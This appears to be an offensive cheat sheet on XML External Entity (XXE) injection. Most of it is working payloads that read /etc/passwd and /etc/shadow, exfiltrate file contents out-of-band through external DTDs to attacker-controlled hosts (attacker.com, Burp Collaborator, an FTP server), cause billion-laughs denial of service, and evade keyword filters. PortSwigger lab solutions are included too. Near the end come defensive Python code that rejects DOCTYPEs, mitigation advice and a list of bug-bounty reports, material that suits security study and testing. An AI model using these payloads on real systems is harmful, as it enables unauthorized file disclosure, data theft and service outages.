# XXE


## What is XXE (XML External Entity) Vulnerability?

**XML External Entity (XXE)** is a vulnerability that occurs when an application parses user-supplied XML with a parser that still honours entity declarations. In XML, an **entity** is a named storage unit of data, which can be internal (defined inside the XML document) or external (a file or URL that the parser fetches). An attacker can exploit XXE to:

* **Read arbitrary files** on the server (e.g., `/etc/passwd`).
* **Make requests** to internal systems (Server-Side Request Forgery, SSRF).
* **Cause denial of service** (DoS) by making the parser expand huge or deeply nested entities.
* **Exfiltrate data** by sending sensitive information to an external entity controlled by the attacker.

**There are various types of XXE attacks:**

| XXE Attack Type                                          | Description                                                                                                        |
| -------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------ |
| Exploiting XXE to retrieve files                         | An external entity is defined with the contents of a file, which is then returned in the application's response.  |
| Exploiting XXE to perform SSRF attacks                   | An external entity is defined from a URL pointing at a back-end system.                                           |
| Exploiting blind XXE to exfiltrate data out-of-band      | Sensitive data is transmitted from the application server to a system that the attacker controls.                 |
| Exploiting blind XXE to retrieve data via error messages | The attacker triggers a parsing error message that contains sensitive data.                                        |

> **Methodology** [whitechaitai](https://twitter.com/whitechaitai)

1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml".
2. If file uploads allow docx/xlsx/pdf/zip, unzip the package and add your evil XML code into the XML files.
3. If SVG is allowed in picture upload, you can inject XML in SVGs.
4. If the web app offers RSS feeds, add your malicious code into the RSS.
5. Fuzz for /soap APIs; some applications are still running SOAP APIs.
6. If the target web app allows for SSO integration, you can inject your malicious XML code in the SAML request/response.

## Test Payload

#### Using private External Entity

```xml
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY cat "Tom">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>
```

#### Using a public External Entity

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
	<!ELEMENT data ANY >
	<!ENTITY cat SYSTEM "file:///etc/passwd">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>
```

## CDATA

* [ ] XXE that can return the contents of an XML file by wrapping it in a CDATA section (so its markup does not break the parse):

  ```xml
  <?xml version="1.0"?>
  <!DOCTYPE data [
  <!ELEMENT data ANY >
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///var/www/html/myapp/WEB-INF/web.xml" >
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://192.168.1.5:8000/wrapper.dtd" >
  %dtd;
  ]>
  <Contact>
  <lastName>&wrapper;</lastName>
  <firstName>FIRSTNAME_FILLER</firstName>
  </Contact>
  ```
* [ ] Inside the `wrapper.dtd` (the external DTD file)

  * Its purpose is to concatenate the three parameter entities into a single general entity:

  ```xml
  <!ENTITY wrapper "%start;%file;%end;">
  ```

## **Exploitation**

**LFI Test**

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
```

**Blind LFI test (when first case doesn't return anything)**

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
```

**Access Control bypass (loading restricted resources - PHP example)**

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>
```

**SSRF Test**

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
```

**XEE (XML Entity Expansion - DOS)**

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```

**XEE #2 (Remote attack - through external xml inclusion)**

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test;</lol></lolz>
```

**XXE FTP HTTP Server**

<https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb>

<http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html>

```xml
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>
```

File stored on `http://publicServer.com/parameterEntity_sendftp.dtd`:

```xml
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
```

**XXE UTF-7**

```xml
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```

To convert between UTF-8 and UTF-7, use `recode`: `recode UTF8..UTF7 payload-file.xml`

* [ ] [**Blind XXE with out-of-band interaction**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)

  **Exploit**

  ```xml
  <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://604s4g1hgg9g6irk4v41hsjt2k8bw4kt.oastify.com"> ]>
  <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
  ```
* [ ] [**Exploiting blind XXE to exfiltrate data using a malicious external DTD**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)

  **External DTD**

  ```xml
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
  %eval;
  %exfil;
  ```

  **Exploit**

  ```xml
  <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
  ```
* [ ] [**Blind XXE with out-of-band interaction via XML parameter entities**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)

  **Exploit**

  ```xml
  <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
  ```
* [ ] [**Exploiting blind XXE to retrieve data via error messages**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) **\[ DTD Blind Out-of-band ]**

  > On the exploit server, change the hosted file name to `/exploit.dtd` (a Document Type Definition file) and give it the following payload. `&#x25;` is the hex character reference for the percent sign `%`; parameter entities are referenced with `%` instead of the usual `&`, and the inner reference has to be encoded so that the nested declaration is only created when `%eval;` is expanded.

  ```xml
  <!ENTITY % file SYSTEM "file:///home/carlos/secret">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://COLLABORATOR.net/?x=%file;'>">
  %eval;
  %exfil;
  ```

  > Modify the file upload XML body of the request before sending to the target server.

  ```xml
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE users [<!ENTITY % xxe SYSTEM "https://EXPLOIT.net/exploit.dtd"> %xxe;]>
  <users>
      <user>
          <username>Carl Toyota</username>
          <email>carlos@hacked.net</email>
      </user>    
  </users>
  ```
* [ ] [**Exploiting XInclude to retrieve files**](https://portswigger.net/web-security/xxe/lab-xinclude-attack)

  > File upload or user import functions on the target that accept XML files can be vulnerable to XML external entity (XXE) injection.

  **Identify XML**

  > It is possible to find XXE attack surface in requests that do not contain any XML at all.

  > To identify XXE in less obvious parameters or requests, add the reference below (with the `&` ampersand URL-encoded) and watch the response.

  `%26entity;`

  > The server may respond with an **indication that XML entities are not allowed for security reasons**, which confirms the value reaches an XML parser.

  ```xml
  <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
  ```

  URL-encode the XInclude payload before sending:

  ```
  <foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>
  ```
* [ ] [PortSwigger Lab: Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)

  **XXE via SVG Image upload**

  > Identify an image upload on the blog post function that accepts SVG images, and observe that the avatars already in the blog's source code have the SVG extension.

  > The content of the image.svg file uploaded:

  ```xml
  <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///home/carlos/secret" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
  ```

* [ ] [**Exploiting XXE to retrieve data by repurposing a local DTD**](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)

  > Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`.

  ```xml
  <!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
  <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
  <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
  &#x25;eval;
  &#x25;error;
  '>
  %local_dtd;
  ]>
  ```

**XML External Entity (XXE) Injection Payloads**

**XXE: Basic XML Example**

```xml
<?xml version="1.0" ?>
<userInfo>
 <firstName>John</firstName>
 <lastName>Doe</lastName>
</userInfo>
```

**XXE: Entity Example**

```xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&example;</lastName>
</userInfo>
```

**XXE: File Disclosure**

```xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>
```

**XXE: Denial-of-Service Example**

```xml
<?xml version="1.0" ?>
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```


**XXE: Base64 Encoded**

```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```

**XXE inside SOAP Example**

```xml
<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>
```

**XXE inside SVG**

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
    <image xlink:href="expect://ls"></image>
</svg>
```

## Bypassing Filters that Block "ENTITY":

If a web application is filtering or blocking the word "ENTITY" to prevent XXE attacks, there are several **bypass techniques** you can try:

**1. Case Manipulation:**

* Some filters are case-sensitive and may only block the exact string `ENTITY` in uppercase. You can try different cases, such as:

  ```xml
  <!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  ```

  Test variations like:

  * `<!entity>`
  * `<!EnTiTy>`

**2. Use Parameter Entities:**

* Instead of defining an external entity directly, you can use **parameter entities** (which start with `%`) to indirectly reference the malicious entity:

  ```xml
  <?xml version="1.0" ?>
  <!DOCTYPE foo [ 
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
  %dtd;
  ]>
  <foo>&xxe;</foo>
  ```

  The malicious `.dtd` file hosted on `attacker.com` could contain the payload for reading a file.

**3. Hex Encoding:**

* Sometimes, filters may miss encoded characters. You can try encoding the word `ENTITY` using its **hexadecimal** or **decimal** representation in XML:

  ```xml
  <!DOCTYPE foo [ 
  <!&#69;&#78;&#84;&#73;&#84;&#89; xxe SYSTEM "file:///etc/passwd">
  ]>
  ```

  This encodes "ENTITY" in decimal (69 for 'E', 78 for 'N', etc.). In hex, it would be `<!&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59; xxe SYSTEM "file:///etc/passwd">`.

**4. Using DTD Chaining:**

* If you have control over external DTDs, you can chain DTDs to bypass filters. This involves referencing a remote DTD file hosted by the attacker:

  ```xml
  <!DOCTYPE foo [ 
  <!ENTITY % remote SYSTEM "http://attacker.com/external.dtd">
  %remote;
  ]>
  ```

  The external DTD file (`external.dtd`) can define the malicious entity, bypassing local filters.

**5. XML Comments:**

* Sometimes filters miss entities hidden inside XML comments. You can obfuscate the payload by breaking the word `ENTITY` into parts:

  ```xml
  <!DOCTYPE foo [ 
  <!--<!ENTITY xxe SYSTEM "file:///etc/passwd">-->
  <!ENT--><!--ITY xxe SYSTEM "file:///etc/passwd">-->
  ]>
  ```

**6. Base64 Encoding:**

* You might be able to encode the payload and then decode it at runtime. Some parsers allow you to inject **base64-encoded** external entities and decode them:

  ```xml
  <!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "data:text/plain;base64,L2V0Yy9wYXNzd2Q=">
  ]>
  <foo>&xxe;</foo>
  ```

  This base64 string decodes to `/etc/passwd`.

**7. Alternative External Sources (e.g., `SYSTEM` or `PUBLIC`):**

* Instead of using `ENTITY`, try to reference external files or URLs using alternative methods. For example:

  ```xml
  <!DOCTYPE foo PUBLIC "-//OASIS//DTD Entity Resolution XML//EN" "http://attacker.com/malicious.dtd">
  ```

  Here, the external DTD contains the payload, and you avoid using the `ENTITY` keyword.
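Every bypass in this section targets a filter that pattern-matches the raw request bytes for a keyword. The defender-side counterpart, added here as an example (not code from the original page), is to decode the document as the encoding it declares and then refuse any DOCTYPE at all, which is how the UTF-7 payload shown earlier on this page is caught while a byte-level signature misses it. `declared_encoding`, `naive_signature_filter`, `contains_doctype`, `utf7_shift` and `evaluate` are names chosen for this example, and the sample documents are constructed (the `file:///etc/hostname` target is a placeholder).

```python
import base64
import codecs
import re

# Encoding pseudo-attribute of the XML declaration. The declaration is plain
# ASCII in every ASCII-compatible encoding, and in the UTF-7 payload on this
# page the prolog is written directly while only the body is shifted.
_ENCODING_DECL = re.compile(
    rb'^\s*<\?xml\s[^>]*?encoding\s*=\s*["\']([A-Za-z0-9._-]+)["\']')
# Any DOCTYPE is refused: without a DTD there are no entity declarations, so
# no external-entity file reads, no SSRF and no entity-expansion DoS.
_DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def declared_encoding(data: bytes) -> str:
    """Return the encoding the document claims, defaulting to UTF-8."""
    if data.startswith(codecs.BOM_UTF8):
        return "utf-8"
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return "utf-16"
    match = _ENCODING_DECL.match(data)
    return match.group(1).decode("ascii") if match else "utf-8"


def naive_signature_filter(data: bytes) -> bool:
    """Byte-level signature check of the kind the bypasses above defeat."""
    return b"<!DOCTYPE" in data or b"<!ENTITY" in data


def contains_doctype(data: bytes) -> bool:
    """Decode as the document itself declares, then look for a DOCTYPE.

    Fails closed: an unknown or undecodable encoding counts as a hit.
    """
    try:
        text = data.decode(declared_encoding(data))
    except (LookupError, UnicodeDecodeError):
        return True
    return _DOCTYPE.search(text) is not None


def utf7_shift(text: str) -> bytes:
    """UTF-7 with every non-alphanumeric character base64-shifted (+...-).

    The standard codec may leave RFC 2152 "Set O" characters such as '<'
    unshifted, so the shifting is done by hand to match the page's payload.
    """
    out, run = bytearray(), []

    def flush():
        if run:
            b64 = base64.b64encode("".join(run).encode("utf-16-be")).rstrip(b"=")
            out.extend(b"+" + b64 + b"-")
            run.clear()

    for ch in text:
        if ch.isascii() and ch.isalnum():
            flush()
            out.append(ord(ch))
        else:
            run.append(ch)
    flush()
    return bytes(out)


# Constructed samples; file:///etc/hostname is a placeholder target.
_BODY = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><foo>&xxe;</foo>'
PLAIN_PAYLOAD = b'<?xml version="1.0"?>' + _BODY.encode("ascii")
UTF7_PAYLOAD = b'<?xml version="1.0" encoding="UTF-7"?>' + utf7_shift(_BODY)
UTF16_PAYLOAD = ('<?xml version="1.0" encoding="UTF-16"?>' + _BODY).encode("utf-16")
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?><foo>hello</foo>'


def evaluate() -> dict:
    """Run both checks over every sample: name -> {check: verdict}."""
    samples = {"plain": PLAIN_PAYLOAD, "utf7": UTF7_PAYLOAD,
               "utf16": UTF16_PAYLOAD, "benign": BENIGN}
    return {name: {"signature": naive_signature_filter(data),
                   "decoded": contains_doctype(data)}
            for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name:7s} signature={verdict['signature']!s:5s} decoded={verdict['decoded']}")
```

Refusing the whole DOCTYPE sidesteps the keyword games: a conforming parser does not expand character references inside a markup declaration's keyword, so there is no need to chase case or encoding variants of the word `ENTITY`; matching on the decoded `<!DOCTYPE` is enough. This gate sits in front of the parser and is defence in depth, not a substitute for configuring the parser itself as described under Mitigation.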

## Mitigation:

From a defensive perspective, to mitigate XXE attacks:

* Disable **external entity processing** (and, wherever possible, DTD processing altogether) in XML parsers where it's not needed.
* Use **whitelisting** for acceptable file or URL references in XML files.
* Implement **input validation** to ensure only valid, trusted XML is processed.
* Ensure your application is updated to use parsers that are not vulnerable to XXE by default.
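The first point of the list above, as an added example in Python using the standard-library expat binding (not code from the original page): `parse_hardened` refuses any DOCTYPE before a single entity can be declared, and `parse_resolving_entities` is the insecure reference configuration that fetches whatever URI an entity declaration names, so both can be run against the same payload. `DoctypeRejected`, `accepts` and `demo` are names chosen for this example; the secret file and the payload in `demo` are constructed at run time in a temporary directory.

```python
import os
import pathlib
import tempfile
import urllib.request
import xml.parsers.expat as expat


class DoctypeRejected(ValueError):
    """Raised when untrusted input carries a DOCTYPE declaration."""


def parse_hardened(xml_bytes: bytes) -> str:
    """Parse untrusted XML and return its character content.

    Any DOCTYPE is refused up front: without a DTD there are no entity
    declarations, so file reads, SSRF, out-of-band exfiltration and
    entity-expansion DoS all lose their foothold in one step.
    """
    parser = expat.ParserCreate()
    parser.buffer_text = True
    chunks = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not accepted from untrusted input")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def parse_resolving_entities(xml_bytes: bytes) -> str:
    """INSECURE reference configuration: resolves external entities.

    This is what a parser does when external entity loading is left on
    (for example Python's xml.sax with feature_external_ges enabled): the
    URI named in the DTD is fetched and its content spliced into the document.
    """
    parser = expat.ParserCreate()
    parser.buffer_text = True
    chunks = []

    def fetch_external(context, base, system_id, public_id):
        sub = parser.ExternalEntityParserCreate(context)
        sub.CharacterDataHandler = chunks.append
        with urllib.request.urlopen(system_id) as resp:  # file://, http://, ...
            sub.Parse(resp.read(), True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def accepts(xml_bytes: bytes) -> bool:
    """True if the hardened parser accepts the document, False if it rejects it."""
    try:
        parse_hardened(xml_bytes)
        return True
    except DoctypeRejected:
        return False


def demo() -> dict:
    """Build a constructed secret file and a page-style payload that names it."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("constructed-secret-value")
        secret_path = fh.name
    secret_uri = pathlib.Path(secret_path).as_uri()
    payload = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [\n'
        f'<!ENTITY xxe SYSTEM "{secret_uri}">]>\n'
        '<foo>&xxe;</foo>'
    ).encode()
    benign = b'<?xml version="1.0"?><foo>hello</foo>'
    try:
        return {
            "benign_text": parse_hardened(benign),
            "payload_accepted_by_hardened": accepts(payload),
            "payload_text_when_resolving": parse_resolving_entities(payload),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Refusing the DOCTYPE is the single control that removes every DTD-based variant on this page at once, including the billion-laughs expansion and the parameter-entity tricks, because all of them need a DTD in which to declare entities. XInclude is not a DTD feature: it is only processed when a library is asked to (lxml's `xinclude()`) or when the parser feature is on (Java's `setXIncludeAware(true)`), so it has to be kept off separately.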

## References

👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_\(XXE\)_Processing)

👉 [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)

👉 [Testing for XML Injection (OTG-INPVAL-008)](https://www.owasp.org/index.php/Testing_for_XML_Injection_\(OTG-INPVAL-008\))

## Top XXE reports from HackerOne:

1. [XXE at ecjobs.starbucks.com.cn/retail/hxpublic\_v6/hxdynamicpage6.aspx](https://hackerone.com/reports/500515) to Starbucks - 308 upvotes, $4000
2. [XXE on pulse.mail.ru](https://hackerone.com/reports/505947) to Mail.ru - 263 upvotes, $6000
3. [XXE on sms-be-vip.twitter.com in SXMP Processor](https://hackerone.com/reports/248668) to Twitter - 250 upvotes, $10080
4. [XXE on https://duckduckgo.com](https://hackerone.com/reports/483774) to DuckDuckGo - 209 upvotes, $0
5. [Phone Call to XXE via Interactive Voice Response](https://hackerone.com/reports/395296) to ██████ - 170 upvotes, $0
6. [Partial bypass of #483774 with Blind XXE on https://duckduckgo.com](https://hackerone.com/reports/486732) to DuckDuckGo - 151 upvotes, $0
7. [Multiple endpoints are vulnerable to XML External Entity injection (XXE)](https://hackerone.com/reports/72272) to Pornhub - 136 upvotes, $2500
8. [XXE through injection of a payload in the XMP metadata of a JPEG file](https://hackerone.com/reports/836877) to Informatica - 128 upvotes, $0
9. [XXE Injection through SVG image upload leads to SSRF](https://hackerone.com/reports/897244) to Zivver - 111 upvotes, $0
10. [XXE in Site Audit function exposing file and directory contents](https://hackerone.com/reports/312543) to Semrush - 99 upvotes, $2000
11. [\[RCE\] Unserialize to XXE - file disclosure on ams.upload.pornhub.com](https://hackerone.com/reports/142562) to Pornhub - 89 upvotes, $10000
12. [XXE in DoD website that may lead to RCE](https://hackerone.com/reports/227880) to U.S. Dept Of Defense - 89 upvotes, $0
13. [Blind XXE via Powerpoint files](https://hackerone.com/reports/334488) to Open-Xchange - 86 upvotes, $2000
14. [blind XXE in autodiscover parser](https://hackerone.com/reports/315837) to Mail.ru - 70 upvotes, $5000
15. [LFI and SSRF via XXE in emblem editor](https://hackerone.com/reports/347139) to Rockstar Games - 68 upvotes, $1500
16. [Blind OOB XXE At "http://ubermovement.com/"](https://hackerone.com/reports/154096) to Uber - 55 upvotes, $500
17. [XXE on webdav.mail.ru - PROPFIND/PROPPATCH](https://hackerone.com/reports/758978) to Mail.ru - 54 upvotes, $10000
18. [XXE on ██████████ by bypassing WAF ████](https://hackerone.com/reports/433996) to QIWI - 53 upvotes, $5000
19. [\[rev-app.informatica.com\] - XXE](https://hackerone.com/reports/105434) to Informatica - 44 upvotes, $0
20. [RCE via Local File Read -> php unserialization-> XXE -> unpickling](https://hackerone.com/reports/415501) to h1-5411-CTF - 43 upvotes, $0
21. [XML External Entity (XXE) in qiwi.com + waf bypass](https://hackerone.com/reports/99279) to QIWI - 39 upvotes, $3137
22. [Authenticated XXE](https://hackerone.com/reports/1095645) to WordPress - 39 upvotes, $600
23. [XML Parser Bug: XXE over which leads to RCE](https://hackerone.com/reports/55431) to drchrono - 32 upvotes, $700
24. [XXE on DoD web server](https://hackerone.com/reports/188743) to U.S. Dept Of Defense - 31 upvotes, $0
25. [Singapore - XXE at https://www.starbucks.com.sg/RestApi/soap11](https://hackerone.com/reports/762251) to Starbucks - 28 upvotes, $500
26. [\[app.informaticaondemand.com\] XXE](https://hackerone.com/reports/105753) to Informatica - 24 upvotes, $0
27. [Blind XXE on my.mail.ru](https://hackerone.com/reports/276276) to Mail.ru - 23 upvotes, $800
28. [Non-production Open Database In Combination With XXE Leads To SSRF](https://hackerone.com/reports/742808) to Evernote - 23 upvotes, $0
29. [XXE in upload file feature](https://hackerone.com/reports/105787) to Informatica - 21 upvotes, $0


